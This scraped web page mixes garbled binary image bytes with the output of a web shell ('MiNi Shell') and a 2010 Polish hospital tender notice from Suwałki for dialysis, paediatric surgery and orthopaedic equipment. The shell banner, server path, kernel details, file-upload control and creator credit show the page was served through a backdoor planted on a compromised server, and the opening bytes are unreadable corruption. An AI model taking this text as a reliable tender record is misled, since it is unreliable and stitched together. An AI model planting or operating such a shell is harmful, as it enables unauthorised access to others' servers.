JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100614/165830-N-2010.html

<p class="kh_header"><b>Suwałki: dostawa aparatury i sprzętu medycznego dla Stacji Dializ,  Oddziału Chirurgii Dziecięcej, Oddziału Ortopedyczno - Urazowego SPSW w Suwałkach</b><br>
<b>Numer ogłoszenia: 165830 - 2010; data zamieszczenia: 14.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa aparatury i sprzętu medycznego dla Stacji Dializ,  Oddziału Chirurgii Dziecięcej, Oddziału Ortopedyczno - Urazowego SPSW w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa aparatury i sprzętu medycznego dla Stacji Dializ,  Oddziału Chirurgii Dziecięcej, Oddziału Ortopedyczno - Urazowego SPSW w Suwałkach w asortymencie określonym w załączniku nr 3 (formularz asortymentowo - cenowy) do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.11.00-3, 33.14.17.70-8, 33.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu nie przewiduje się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania;  
W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:
oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)posiadania wiedzy i doświadczenia; 
W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:
oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;  
W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:
oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)sytuacji ekonomicznej i finansowej. 
W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:
oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)oświadczenia, że oferowany asortyment posiada dokumenty wymagane przez polskie prawo, na podstawie których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia w RP - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ ;

2)wypełnionego arkusza asortymentowo - cenowego (wzór stanowi załącznik nr 3 do SIWZ).

3) formularz parametry techniczne - załącznik nr 4 do SIWZ.

4)katalogu (prospektu) w języku polskim, w którym został zaznaczony oferowany asortyment (pozycja   z kodem)  - w przypadku firm dysponujących katalogiem (prospektem) zawierającym różny asortyment. W przypadku firm, które dysponują odrębnymi katalogami (prospektami) dla oferowanego asortymentu zobowiązane są one do dołączenia do ofert tylko tych katalogów (prospektów), które dotyczą oferowanego asortymentu.


Zamawiający wymaga także dołączenia do oferty:

1)wypełnionego druku oferty, który stanowi załącznik nr 1 do SIWZ  
2)pełnomocnictwa dla osoby składającej ofertę w przypadku działania Wykonawcy przez pełnomocnika
3)pełnomocnictwa dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Wojewódzki w Suwałkach Dział Zamówień Publicznych, ul. Szpitalna 60, 16 - 400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2010 godzina 09:30, miejsce: Kancelaria Samodzielnego Publicznego Szpitala Wojewódzkiego w Suwałkach, ul. Szpitalna 60, 16-400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - Sprzęt i aparatura dla Stacji Dializ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet I - Sprzęt i aparatura dla Stacji Dializ
1. Aparat do hemodializy (parametry techniczne załącznik nr 4 do SIWZ) - szt. 2;
2. Przystawka cytrynianowa do aparatu typu multifiltrat (parametry techniczne załącznik nr 4 do SIWZ) - szt. 1;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II - Sprzęt dla Oddziału Chirurgii Dziecięcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet II - Sprzęt dla Oddziału Chirurgii Dziecięcej
(parametry techniczne załącznik nr 4 do SIWZ) 
I Zestaw akcesoria do elastycznych zespoleń śródszpikowych;			
1 Gwóźdż gładki śródszpikowy dla dzieci:
			
1.1 Wygięty  L=240; O 2,0	szt.	5;	
1.2 Wygięty  L=280; O 2,0	szt.	5;	
1.3 Wygięty  L=310; O 2,0	szt.	5;	
1.4 Wygięty  L=320; O 2,0	szt.	5;	
1.5 Wygięty  L=400; O 2,0	szt.	5;	
1.6 Wygięty  L=310; O 2,2	szt.	5;	
1.7 Wygięty  L=400; O 2,2	szt.	5;	
1.8 Wygięty  L=240; O 2,5	szt.	5;	
1.9 Wygięty  L=280; O 2,5	szt.	5;	
1.10 Wygięty  L=320; O 2,5	szt.	5;	
1.11 Wygięty  L=2360; O 2,5 szt.	5;	
1.12 Wygięty  L=400; O 2,5	szt.	5;	
1.13 Wygięty  L=280; O 3,0	szt.	5;	
1.14 Wygięty  L=320; O 3,0	szt.	5;	
1.15 Wygięty  L=360; O 3,0	szt.	5;	
1.16 Wygięty  L=400; O 3,0	szt.	5;	
1.17 Wygięty  L=280; O 3,5	szt.	5;	
1.18 Wygięty  L=320; O 3,5	szt.	5;	
1.19 Wygięty  L=360; O 3,5	szt.	5;	
1.20 Wygięty  L=400; O 3,5	szt.	5;	
1.21 Wygięty  L=420; O 3,5	szt.	5;	
1.22 Wygięty  L=320; O 4,0	szt.	5;	
1.23 Wygięty  L=360; O 4,0	szt.	5;	
1.24 Wygięty  L=400; O 4,0	szt.	5;	
1.25 Wygięty  L=420; O 4,0	szt.	5;	
1.26 Wygięty  L=440; O 4,0	szt.	5;	
1.27 Wygięty  L=460; O 4,0	szt.	5;	
2 Gwóźdź moletowany śródszpikowy dla dzieci;			
2.1 Wygięty  L=240; O 2,0	szt.	5;	
2.2 Wygięty  L=280; O 2,0	szt.	5;	
2.3 Wygięty  L=310; O 2,0	szt.	5;	
2.4 Wygięty  L=320; O 2,0	szt.	5;	
2.5 Wygięty  L=400; O 2,0	szt.	5;	
2.6 Wygięty  L=310; O 2,2	szt.	5;	
2.7 Wygięty  L=400; O 2,2	szt.	5;	
2.8 Wygięty  L=240; O 2,5	szt.	5;	
2.9 Wygięty  L=280; O 2,5	szt.	5;	
2.10 Wygięty  L=320; O 2,5	szt.	5;	
2.11 Wygięty  L=360; O 2,5	szt.	5;	
2.12 Wygięty  L=400; O 2,5	szt.	5;	
2.13 Wygięty  L=280; O 3,0	szt.	5;	
2.14 Wygięty  L=320; O 3,0	szt.	5;	
2.15 Wygięty  L=360; O 3,0	szt.	5;	
2.16 Wygięty  L=400; O 3,0	szt.	5;	
2.17 Wygięty  L=280; O 3,5	szt.	5;	
2.18 Wygięty  L=320; O 3,5	szt.	5;	
2.19 Wygięty  L=360; O 3,5	szt.	5;	
2.20 Wygięty  L=400; O 3,5	szt.	5;	
2.21 Wygięty  L=420; O 3,5	szt.	5;	
2.22 Wygięty  L=320; O 4,0	szt.	5;	
2.23 Wygięty  L=360; O 4,0	szt.	5;	
2.24 Wygięty  L=400; O 4,0	szt.	5;	
2.25 Wygięty  L=420; O 4,0	szt;.	5;	
2.26 Wygięty  L=440; O 4,0	szt.	5;	
2.27 Wygięty  L=460; O 4,0	szt.	5;	
3 Gwóźdź gięty śródszpikowy dla dzieci;			
3.1 L = 470 mm	szt.	5;	
3.2 L = 480 mm	szt.	5;	
3.3 L = 490 mm	szt.	5;	
II Instrumentarium do elastycznych zespoleń śródszpikowych;			
1 Kleszcze (do wykręcania urwanych wkrętów)	szt.	1;	
2 Uchwyt (do wprowadzania gwoździ)	szt.	2;	
3 Szydło wygięte	szt.	2;	
4 Szydło proste	szt.	2;	
5 Kleszcze do obcinania drutu	szt.	1;	
6 Nasadka ochronna O 2,0	szt.	15;	
7 Osłonka tkanek	szt.	1;	
8 Nasadka ochronna O 2,2	szt.	9;	
9 Nasadka ochronna O 2,5	szt.	15;	
10 Nasadka ochronna O 3,0	szt.	12;	
11 Nasadka ochronna O 3,5	szt.	15;	
12 Nasadka ochronna O 4,5	szt.	9;	
13 Prowadnik wiertła O 4,7	szt.	1;	
14 Zaginak do gwoździ	szt.	2;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.70-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III - Sprzęt dla Oddziału Ortopedyczno - Urazowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet III - Sprzęt dla Oddziału Ortopedyczno - Urazowego;
I Zestaw do ablacji niskotemperaturowej ortopedycznej tj. Waporyzator szt. 1;
II System do szycia łękotki - złożony z dwóch miękkich implantów, wykonanych z poliestru #5, połączonych samozaciskającą się podwójną nicią 2,0: implanty osadzone na podwójnym, jednorazowym podajniku z dźwigami; stosowany z  metalowymi prowadnicami umożliwiającymi precyzyjne szycie pod różnym kątem	szt.	1;
III Zestaw do instrumentów do rekonstrukcji ACL;		
1 Striper	szt.	1;
2 Pinociąg	szt.	1;
3 Frez 7 mm	szt.	1;
4 Frez 8 mm	szt.	1;
5 Frez 9 mm	szt.	1;
6 Frez 10 mm	szt.	1;
7 Osteotom	szt.	1;
8 Celownik piszczelowy 3 wymiarowy	szt.	1;
9 Prowadnica wiertła do celownika piszczelowego	szt.1;
10 Pręt do celownika 3-ci wymiar szt.	1;
11 Tuleja rozmiarowa 7 mm	szt.	1;
12 Tuleja rozmiarowa 8 mm	szt.	1;
13 Tuleja rozmiarowa 9 mm	szt.	1;
14 Tuleja rozmiarowa 10 mm szt.	1;
15 Uchwyt przeszczepu 7 - 8 mm szt.	1;
16 Uchwyt przeszczepu 9 - 10 mm szt.1;
17 Przymiar głębokości kanału szt.	1;
18 Wiertło prowadzące O 2,4 mm szt.	5;
19 Śrubokręt do śrub tytanowych szt.	1;
IV Zestaw do plastyki mozaikowej chrząstki;		
1 Zestaw narzędzi standardowy szt.	1;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.70-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com